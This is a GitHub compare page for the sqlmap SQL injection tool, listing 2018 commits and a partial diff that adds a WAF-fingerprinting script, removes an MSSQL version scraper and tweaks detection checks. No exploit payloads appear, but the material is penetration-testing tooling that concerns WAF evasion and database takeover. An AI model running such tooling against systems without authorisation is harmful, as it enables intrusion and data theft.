Compare commits

...

113 Commits

Author SHA1 Message Date
Miroslav Stampar
8bf566361d Removing an obsolete utility 2018-10-02 12:57:52 +02:00
Miroslav Stampar
065c5e8157 Fixes #3264 2018-09-29 23:10:03 +02:00
Miroslav Stampar
932aa8dd94 Fixes #3262 2018-09-28 13:12:21 +02:00
Miroslav Stampar
71208e891c Update regarding #3258 2018-09-27 09:15:53 +02:00
Miroslav Stampar
3b369920a1 Minor patch related to the #3257 2018-09-26 15:33:34 +02:00
Miroslav Stampar
68a83098ab Update of THANKS (based on 2017 donation) 2018-09-25 14:06:32 +02:00
Miroslav Stampar
f4a0820dcb Merging of tamper script arguments (e.g. --tamper A --tamper B -> --tamper=A,B) 2018-09-24 14:00:58 +02:00
Miroslav Stampar
459e1dd9a4 Update related to the #3252 2018-09-24 10:26:27 +02:00
Miroslav Stampar
4b698748f7 Fixes #3247 2018-09-21 23:25:25 +02:00
Miroslav Stampar
e697354765 Fixing non-resumal of MsSQL/Sybase/MaxDB enumeration queries 2018-09-21 23:06:45 +02:00
Miroslav Stampar
721046831b Minor patch 2018-09-21 22:15:29 +02:00
Miroslav Stampar
a4068f9abf Minor update 2018-09-20 16:52:02 +02:00
Miroslav Stampar
245c5e64e9 Minor cleanup 2018-09-19 11:13:59 +02:00
Miroslav Stampar
cd08d13647 Adding a generic parameter replace payload 2018-09-19 11:05:55 +02:00
Miroslav Stampar
8abae02111 Improvement of anti-CSRF token extraction 2018-09-18 22:05:52 +02:00
Miroslav Stampar
dd9bfd13f2 Trivial update 2018-09-18 17:03:27 +02:00
Miroslav Stampar
0c7eecee9f Trivial update (message language) 2018-09-18 16:52:17 +02:00
Miroslav Stampar
3e72da66f9 Minor update (preventing WAF specific response reports on generic 403) 2018-09-18 16:45:08 +02:00
Miroslav Stampar
ca9a56c0ff Minor update of WebKnight WAF script 2018-09-15 23:27:24 +02:00
Miroslav Stampar
2d2b20344d Minor patch for bigip WAF script 2018-09-15 23:17:32 +02:00
Miroslav Stampar
a8a7dee800 Fixes #3239 2018-09-15 21:36:21 +02:00
Miroslav Stampar
35d9ed8476 Cleaning a mess with stacked queries and pre-WHERE boundaries 2018-09-14 10:30:58 +02:00
Miroslav Stampar
a5e3dce26f Proper naming 2018-09-14 10:01:31 +02:00
Miroslav Stampar
71448b1c16 Minor refactoring 2018-09-14 09:45:04 +02:00
Miroslav Stampar
a633bc7f32 Trivial cleanup 2018-09-13 11:41:19 +02:00
Miroslav Stampar
6697e49f75 Adding aesecure and crawlprotect WAF scripts 2018-09-13 11:09:32 +02:00
xxbing
db8bcd1d2e update xforwarder tamper (#3236) 2018-09-13 10:50:58 +02:00
Miroslav Stampar
16c052ef13 Fixes #3234 (user entered input) 2018-09-12 14:39:07 +02:00
Miroslav Stampar
a8c0722631 Minor update regarding #3230 2018-09-10 12:43:59 +02:00
Miroslav Stampar
c9a73aeed1 Minor patch for #3226 2018-09-10 11:51:00 +02:00
Miroslav Stampar
470b68a83c Implementation for Issue #3226 2018-09-10 11:47:19 +02:00
Miroslav Stampar
f01ae291f8 Update related to the #3231 2018-09-10 10:27:28 +02:00
Ehsan Nezami
c36749c3bb add u_pass to columns (#3231) 2018-09-10 10:26:28 +02:00
Miroslav Stampar
63b84c31e5 Update regarding the #3229 2018-09-08 23:36:08 +02:00
Miroslav Stampar
ec253dd5bd Support for table name retrieval from mysql.innodb_table_stats (fallback if primary fails) 2018-09-07 11:53:43 +02:00
Miroslav Stampar
4c25a20efc Docstring update and smalldict update (merge with top1575) 2018-09-07 11:23:47 +02:00
Miroslav Stampar
2b56bdfaa6 Patch for MsSQL column name injection 2018-09-06 13:59:07 +02:00
Miroslav Stampar
c37014b8e8 Implementation for an Issue #647 2018-09-06 00:59:29 +02:00
Miroslav Stampar
349e9b9fa5 Minor commit related to the #120 2018-09-06 00:16:59 +02:00
Miroslav Stampar
ac481492c0 Final commit for #120 2018-09-05 23:29:52 +02:00
Miroslav Stampar
91c5151770 Another update related to the #120 2018-09-05 00:56:39 +02:00
Miroslav Stampar
ad5a731999 First commit for Issue #120 2018-09-05 00:16:35 +02:00
Miroslav Stampar
95be19a692 Minor update 2018-09-05 00:15:15 +02:00
Miroslav Stampar
dbcf030743 Accepting even dummy (e.g.) 'y' for --answers 2018-09-04 23:30:58 +02:00
Miroslav Stampar
fa3f3baf1e Minor update 2018-09-04 23:24:40 +02:00
Miroslav Stampar
f125f64a80 Minor style update (marker for empty cracked password) 2018-09-04 23:14:25 +02:00
Miroslav Stampar
12012b36b1 Automatic disabling of socket-preconnect for known problematic server (SimpleHTTPServer) 2018-09-04 23:01:17 +02:00
Miroslav Stampar
43c9e21c56 Performance improvement and reducing number of false-positives in heavily dynamic pages 2018-09-04 22:39:07 +02:00
Miroslav Stampar
a831865633 Further narrowing down cloudfront WAF script (less FP on detection) 2018-08-30 17:44:37 +02:00
Miroslav Stampar
578c41f6de Fine tuning Incapsula WAF script 2018-08-30 16:49:06 +02:00
Miroslav Stampar
dc01f2e773 Fine tuning of Cloudfrount WAF script (less FP) 2018-08-30 16:42:35 +02:00
Miroslav Stampar
db327a8538 Minor update of WAF scripts 2018-08-30 16:19:31 +02:00
Miroslav Stampar
aefb815064 Cutting down FP on Varnish WAF (ignoring Varnish Cache) 2018-08-30 16:02:27 +02:00
Miroslav Stampar
014978cebc Fine tuning Cloudflare WAF script 2018-08-30 16:00:40 +02:00
Miroslav Stampar
287371337d Update of ZENEDGE WAF script 2018-08-30 15:56:13 +02:00
Miroslav Stampar
62a3618353 Minor patches 2018-08-30 15:50:17 +02:00
Miroslav Stampar
366a3f9336 Detect redirect from stdout 2018-08-30 15:21:46 +02:00
Miroslav Stampar
74d2b60cf3 Minor colorization of WAF Detectify 2018-08-30 15:18:42 +02:00
Miroslav Stampar
9e892e93f3 Created a WAF Detectify utility 2018-08-30 14:54:15 +02:00
Miroslav Stampar
0bbf5f9467 Update of dotDefender WAF script 2018-08-29 12:21:33 +02:00
Miroslav Stampar
8be4b29fd1 Update of Incapsula WAF script 2018-08-29 12:13:22 +02:00
Miroslav Stampar
0507234add Minor update 2018-08-29 11:06:45 +02:00
Miroslav Stampar
c3d9a1c2d4 Airlock also uses AL_SESS-S cookie 2018-08-29 10:56:24 +02:00
Miroslav Stampar
9e8b28be7c Minor patch (e.g. case: user's) 2018-08-28 14:33:48 +02:00
Miroslav Stampar
f3f4a4cb37 Minor refactoring 2018-08-28 14:31:20 +02:00
Miroslav Stampar
2280f3ff2d Updating old links 2018-08-28 14:13:48 +02:00
Miroslav Stampar
d6cf038e48 Fixes #3216 2018-08-25 22:57:49 +02:00
Miroslav Stampar
2dfc383700 Fixes #3215 2018-08-22 17:58:00 +02:00
Miroslav Stampar
f20e7b403a Fixes #3211 2018-08-22 10:41:43 +02:00
Miroslav Stampar
36e62fe8a7 Minor update 2018-08-22 10:20:26 +02:00
Miroslav Stampar
2542b6d241 Minor patch (https version of site is not available) 2018-08-20 19:44:25 +02:00
Miroslav Stampar
bc13d8923b Adding long_description to PyPI upload script 2018-08-20 19:43:27 +02:00
Miroslav Stampar
e51db6b355 Update README.md 2018-08-20 19:33:19 +02:00
Miroslav Stampar
6d28ca1f93 Bug fix (single-quoted strings in long results caused line breaks) 2018-08-18 00:02:39 +02:00
Miroslav Stampar
03e4741a69 Trivial patch (display of used user queries) 2018-08-17 19:45:34 +02:00
Miroslav Stampar
b899ab9eb3 Bug fix (sha-256,sha384... were recognized, though, not cracked) 2018-08-13 15:27:08 +02:00
Miroslav Stampar
2e017eee99 Fixes #3203 2018-08-10 14:16:27 +02:00
Miroslav Stampar
a296d22195 Fixes #3205 2018-08-10 14:01:55 +02:00
Miroslav Stampar
ad11749b15 One more payload (requires usage of --code or similar) 2018-08-09 16:21:35 +02:00
Miroslav Stampar
75a64245c5 Minor patch for colorization (multiple quoted strings in same line) 2018-08-09 16:21:04 +02:00
Miroslav Stampar
9e00202823 Minor patch (use redirection code for comparison) 2018-08-09 15:39:37 +02:00
Miroslav Stampar
df977d93d4 Fixes #3204 2018-08-09 15:08:21 +02:00
Miroslav Stampar
b0ca52086a Fixes #3202 2018-08-07 23:35:58 +02:00
Miroslav Stampar
af89137f2c Update of WAF scripts 2018-08-05 14:19:27 +02:00
Miroslav Stampar
1f9bf587b5 Implementation for an Issue #3108 2018-07-31 02:18:33 +02:00
Miroslav Stampar
f0e4c20004 First commit related to the #3108 2018-07-31 01:17:11 +02:00
Miroslav Stampar
cef416559a Minor update 2018-07-31 00:20:52 +02:00
Miroslav Stampar
ce47b6c76e Minor patch 2018-07-27 01:39:04 +02:00
Miroslav Stampar
39108bc100 Trivial refactoring of unused variables 2018-07-27 00:59:24 +02:00
Miroslav Stampar
f63ceaa0c1 Minor refactoring 2018-07-27 00:53:14 +02:00
Miroslav Stampar
1e60378fb2 Minor refactoring 2018-07-27 00:30:30 +02:00
Miroslav Stampar
22c7bc54b4 Minor patch 2018-07-27 00:01:23 +02:00
Miroslav Stampar
5f1bae86b0 Fixes #3194 2018-07-19 18:00:56 +02:00
Miroslav Stampar
a0cbf6991d Minor style update 2018-07-18 17:00:34 +02:00
Miroslav Stampar
9f2bc00426 Minor patch 2018-07-18 16:30:59 +02:00
Miroslav Stampar
6bb486c1bf Potential patch for #3192 2018-07-18 15:34:38 +02:00
Miroslav Stampar
741ce9e3f0 Trivial update (just to reset checksums) 2018-07-15 16:08:01 +02:00
Anastasios Stasinopoulos
a479655097 Minor patch (--purge instead of --purge-output) (#3188) 2018-07-15 11:28:34 +02:00
Miroslav Stampar
4846d85ccd Pre-fetching latest revision number in case of update 2018-07-11 19:30:14 +02:00
Miroslav Stampar
3c439c3929 Known cause of majority of false-positives (Issue #3176) 2018-07-11 16:12:57 +02:00
Miroslav Stampar
5cc36a5736 Revert of last commit (Fixes #3179) 2018-07-10 15:54:06 +02:00
Miroslav Stampar
29dcdd3bef Potential patch for #3178 2018-07-10 15:35:07 +02:00
Miroslav Stampar
53eadb0af8 Fixes #3173 2018-07-09 12:22:51 +02:00
Miroslav Stampar
7b705b94e3 Fixes #3171 2018-07-09 12:20:18 +02:00
Miroslav Stampar
558484644a Minor refactoring 2018-07-06 16:22:19 +02:00
Miroslav Stampar
e84142b6a9 Fixes #3172 2018-07-06 16:18:04 +02:00
Miroslav Stampar
b44551230e Fixes #3165 2018-07-05 15:13:51 +02:00
Miroslav Stampar
4ecf6eee05 Minor style update 2018-07-05 14:21:32 +02:00
Miroslav Stampar
57be1856a6 Where things could go kaboom (changing terminal coloring) 2018-07-05 14:01:43 +02:00
Miroslav Stampar
a424e4ab59 Fixes #3168 2018-07-02 13:09:25 +02:00
Miroslav Stampar
4660b816d5 Minor patch (fallback for masking of sensitive data) 2018-07-02 11:54:12 +02:00
Miroslav Stampar
f92e1ebc40 Another trivial style update 2018-07-02 11:47:47 +02:00
Miroslav Stampar
48cd0421a6 Trivial style update 2018-07-02 11:41:36 +02:00
145 changed files with 1531 additions and 911 deletions

View File

@@ -1,6 +1,6 @@
# sqlmap # sqlmap
[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap)
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

View File

@@ -3,7 +3,7 @@
* Implemented support for automatic decoding of page content through detected charset. * Implemented support for automatic decoding of page content through detected charset.
* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
* Major improvements to program stabilization based on user reports. * Major improvements to program stabilization based on user reports.
* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. * Added new tampering scripts avoiding popular WAF/IPS mechanisms.
* Fixed major bug with DNS leaking in Tor mode. * Fixed major bug with DNS leaking in Tor mode.
* Added wordlist compilation made of the most popular cracking dictionaries. * Added wordlist compilation made of the most popular cracking dictionaries.
* Implemented multi-processor hash cracking routine(s). * Implemented multi-processor hash cracking routine(s).
@@ -23,7 +23,7 @@
* Added option `--csv-del` for manually setting delimiting character used in CSV output. * Added option `--csv-del` for manually setting delimiting character used in CSV output.
* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
* Added switch `--smart` for conducting through tests only in case of positive heuristic(s). * Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. * Added switch `--check-waf` for checking of existence of WAF/IPS protection.
* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
* Added switch `--count` to count the number of entries for a specific table or all database(s) tables. * Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
* Major improvements to switches `--tables` and `--columns`. * Major improvements to switches `--tables` and `--columns`.
@@ -55,7 +55,7 @@
* Added option `--host` to set the HTTP Host header value. * Added option `--host` to set the HTTP Host header value.
* Added switch `--hostname` to turn on retrieval of DBMS server hostname. * Added switch `--hostname` to turn on retrieval of DBMS server hostname.
* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. * Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection. * Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). * Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. * Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
* Added switch `--invalid-logical` for usage of logical operations while invalidating values. * Added switch `--invalid-logical` for usage of logical operations while invalidating values.
@@ -78,7 +78,7 @@
* Added option `--skip` to skip testing of given parameter(s). * Added option `--skip` to skip testing of given parameter(s).
* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. * Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
* Added switch `--skip-urlencode` to skip URL encoding of payload data. * Added switch `--skip-urlencode` to skip URL encoding of payload data.
* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection. * Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). * Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). * Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. * Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.

View File

@@ -597,6 +597,7 @@ Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
Patrick Webster, <patrick(at)aushack.com> Patrick Webster, <patrick(at)aushack.com>
* for suggesting an enhancement * for suggesting an enhancement
* for donating to sqlmap development (from OSI.Security)
Ed Williams, <ed.williams(at)ngssecure.com> Ed Williams, <ed.williams(at)ngssecure.com>
* for suggesting a minor enhancement * for suggesting a minor enhancement

View File

@@ -1,137 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import codecs
import os
import re
import urllib2
import urlparse
from xml.dom.minidom import Document
# Path to the XML file with signatures
MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml")
# Url to update Microsoft SQL Server XML versions file from
MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
def updateMSSQLXML():
if not os.path.exists(MSSQL_XML):
errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML
print errMsg
return
infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL
print infoMsg
try:
req = urllib2.Request(MSSQL_VERSIONS_URL)
f = urllib2.urlopen(req)
mssqlVersionsHtmlString = f.read()
f.close()
except urllib2.URLError:
__mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL)
__mssqlHostname = __mssqlPath[1]
warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
warnMsg += " check your Internet connection and retry"
print warnMsg
return
releases = re.findall(r"class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
releasesCount = len(releases)
# Create the minidom document
doc = Document()
# Create the <root> base element
root = doc.createElement("root")
doc.appendChild(root)
for index in xrange(0, releasesCount):
release = releases[index]
# Skip Microsoft SQL Server 6.5 because the HTML
# table is in another format
if release == "6.5":
continue
# Create the <signatures> base element
signatures = doc.createElement("signatures")
signatures.setAttribute("release", release)
root.appendChild(signatures)
startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index])
if index == releasesCount - 1:
stopIdx = len(mssqlVersionsHtmlString)
else:
stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
servicepackVersion = re.findall(r"</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
for servicePack, version in servicepackVersion:
if servicePack.startswith(" "):
servicePack = servicePack[1:]
if "/" in servicePack:
servicePack = servicePack[:servicePack.index("/")]
if "(" in servicePack:
servicePack = servicePack[:servicePack.index("(")]
if "-" in servicePack:
servicePack = servicePack[:servicePack.index("-")]
if "*" in servicePack:
servicePack = servicePack[:servicePack.index("*")]
if servicePack.startswith("+"):
servicePack = "0%s" % servicePack
servicePack = servicePack.replace("\t", " ")
servicePack = servicePack.replace("No SP", "0")
servicePack = servicePack.replace("RTM", "0")
servicePack = servicePack.replace("TM", "0")
servicePack = servicePack.replace("SP", "")
servicePack = servicePack.replace("Service Pack", "")
servicePack = servicePack.replace("<a href=\"http:", "")
servicePack = servicePack.replace(" ", " ")
servicePack = servicePack.replace("+ ", "+")
servicePack = servicePack.replace(" +", "+")
if servicePack.endswith(" "):
servicePack = servicePack[:-1]
if servicePack and version:
# Create the main <card> element
signature = doc.createElement("signature")
signatures.appendChild(signature)
# Create a <version> element
versionElement = doc.createElement("version")
signature.appendChild(versionElement)
# Give the <version> elemenet some text
versionText = doc.createTextNode(version)
versionElement.appendChild(versionText)
# Create a <servicepack> element
servicepackElement = doc.createElement("servicepack")
signature.appendChild(servicepackElement)
# Give the <servicepack> elemenet some text
servicepackText = doc.createTextNode(servicePack)
servicepackElement.appendChild(servicepackText)
# Save our newly created XML to the signatures file
mssqlXml = codecs.open(MSSQL_XML, "w", "utf8")
doc.writexml(writer=mssqlXml, addindent=" ", newl="\n")
mssqlXml.close()
infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
print infoMsg
if __name__ == "__main__":
updateMSSQLXML()

View File

@@ -25,10 +25,11 @@ from setuptools import setup, find_packages
setup( setup(
name='sqlmap', name='sqlmap',
version='$VERSION', version='$VERSION',
description="Automatic SQL injection and database takeover tool", description='Automatic SQL injection and database takeover tool',
long_description='sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.',
author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',
author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
url='https://sqlmap.org', url='http://sqlmap.org',
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
license='GNU General Public License v2 (GPLv2)', license='GNU General Public License v2 (GPLv2)',
packages=find_packages(), packages=find_packages(),

View File

@@ -0,0 +1,8 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
pass

View File

@@ -0,0 +1,119 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import cookielib
import glob
import httplib
import inspect
import os
import re
import subprocess
import sys
import urllib2
sys.dont_write_bytecode = True
NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "sqlmap developers (@sqlmap)"
TIMEOUT = 10
HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cache-Control": "max-age=0"}
SQLMAP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
SCRIPTS_DIR = os.path.join(SQLMAP_DIR, "waf")
LEVEL_COLORS = {"o": "\033[00;94m", "x": "\033[00;91m", "!": "\033[00;93m", "i": "\033[00;92m"}
CACHE = {}
WAF_FUNCTIONS = []
def get_page(get=None, url=None, host=None, data=None):
key = (get, url, host, data)
if key in CACHE:
return CACHE[key]
page, headers, code = None, {}, httplib.OK
url = url or ("%s%s%s" % (sys.argv[1], '?' if '?' not in sys.argv[1] else '&', get) if get else sys.argv[1])
if not url.startswith("http"):
url = "http://%s" % url
try:
req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS)
conn = urllib2.urlopen(req, timeout=TIMEOUT)
page = conn.read()
headers = conn.info()
except Exception, ex:
code = getattr(ex, "code", None)
page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "")
headers = ex.info() if hasattr(ex, "info") else {}
result = CACHE[key] = page, headers, code
return result
def colorize(message):
if not subprocess.mswindows and sys.stdout.isatty():
message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message)
message = message.replace("@sqlmap", "\033[00;96m@sqlmap\033[00;49m")
message = message.replace(NAME, "\033[00;93m%s\033[00;49m" % NAME)
return message
def main():
global WAF_FUNCTIONS
print colorize("%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR))
if len(sys.argv) < 2:
exit(colorize("[x] usage: python %s <hostname>" % os.path.split(__file__)[-1]))
cookie_jar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
urllib2.install_opener(opener)
sys.path.insert(0, SQLMAP_DIR)
for found in glob.glob(os.path.join(SCRIPTS_DIR, "*.py")):
dirname, filename = os.path.split(found)
dirname = os.path.abspath(dirname)
if filename == "__init__.py":
continue
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
if filename[:-3] in sys.modules:
del sys.modules[filename[:-3]]
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or "utf8"))
except ImportError, msg:
exit(colorize("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], msg)))
_ = dict(inspect.getmembers(module))
if "detect" not in _:
exit(colorize("[x] missing function 'detect(get_page)' in WAF script '%s'" % found))
else:
WAF_FUNCTIONS.append((_["detect"], _.get("__product__", filename[:-3])))
WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower())
print colorize("[i] %d WAF scripts loaded" % len(WAF_FUNCTIONS))
found = False
for function, product in WAF_FUNCTIONS:
if found and "unknown" in product.lower():
continue
if function(get_page):
print colorize("[!] WAF/IPS identified as '%s'" % product)
found = True
if not found:
print colorize("[o] nothing found")
print
if __name__ == "__main__":
main()

View File

@@ -140,11 +140,11 @@ def action():
conf.dbmsHandler.udfInjectCustom() conf.dbmsHandler.udfInjectCustom()
# File system options # File system options
if conf.rFile: if conf.fileRead:
conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile)) conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead))
if conf.wFile: if conf.fileWrite:
conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType) conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType)
# Operating system options # Operating system options
if conf.osCmd: if conf.osCmd:

View File

@@ -13,6 +13,7 @@ import random
import re import re
import socket import socket
import subprocess import subprocess
import sys
import tempfile import tempfile
import time import time
@@ -87,9 +88,11 @@ from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS
from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SLEEP_TIME_MARKER
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
@@ -761,7 +764,7 @@ def checkSqlInjection(place, parameter, value):
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
logger.info(infoMsg) logger.info(infoMsg)
process = subprocess.Popen(conf.alert, shell=True) process = subprocess.Popen(conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True)
process.wait() process.wait()
kb.alerted = True kb.alerted = True
@@ -893,7 +896,7 @@ def checkFalsePositives(injection):
kb.injection = injection kb.injection = injection
for i in xrange(conf.level): for level in xrange(conf.level):
while True: while True:
randInt1, randInt2, randInt3 = (_() for j in xrange(3)) randInt1, randInt2, randInt3 = (_() for j in xrange(3))
@@ -989,11 +992,6 @@ def checkFilteredChars(injection):
kb.injection = popValue() kb.injection = popValue()
def heuristicCheckSqlInjection(place, parameter): def heuristicCheckSqlInjection(place, parameter):
if kb.nullConnection:
debugMsg = "heuristic check skipped because NULL connection used"
logger.debug(debugMsg)
return None
if kb.heavilyDynamic: if kb.heavilyDynamic:
debugMsg = "heuristic check skipped because of heavy dynamicity" debugMsg = "heuristic check skipped because of heavy dynamicity"
logger.debug(debugMsg) logger.debug(debugMsg)
@@ -1229,7 +1227,7 @@ def checkStability():
logger.error(errMsg) logger.error(errMsg)
else: else:
warnMsg = "target URL content is not stable. sqlmap will base the page " warnMsg = "target URL content is not stable (i.e. content differs). sqlmap will base the page "
warnMsg += "comparison on a sequence matcher. If no dynamic nor " warnMsg += "comparison on a sequence matcher. If no dynamic nor "
warnMsg += "injectable parameters are detected, or in case of " warnMsg += "injectable parameters are detected, or in case of "
warnMsg += "junk results, refer to user's manual paragraph " warnMsg += "junk results, refer to user's manual paragraph "
@@ -1314,9 +1312,8 @@ def checkRegexp():
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if not re.search(conf.regexp, rawResponse, re.I | re.M): if not re.search(conf.regexp, rawResponse, re.I | re.M):
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp warnMsg = "you provided '%s' as the regular expression " % conf.regexp
warnMsg += "match, but such a regular expression does not have any " warnMsg += "which does not have any match within the target URL raw response. sqlmap "
warnMsg += "match within the target URL raw response, sqlmap "
warnMsg += "will carry on anyway" warnMsg += "will carry on anyway"
logger.warn(warnMsg) logger.warn(warnMsg)
@@ -1335,7 +1332,7 @@ def checkWaf():
if _ is not None: if _ is not None:
if _: if _:
warnMsg = "previous heuristics detected that the target " warnMsg = "previous heuristics detected that the target "
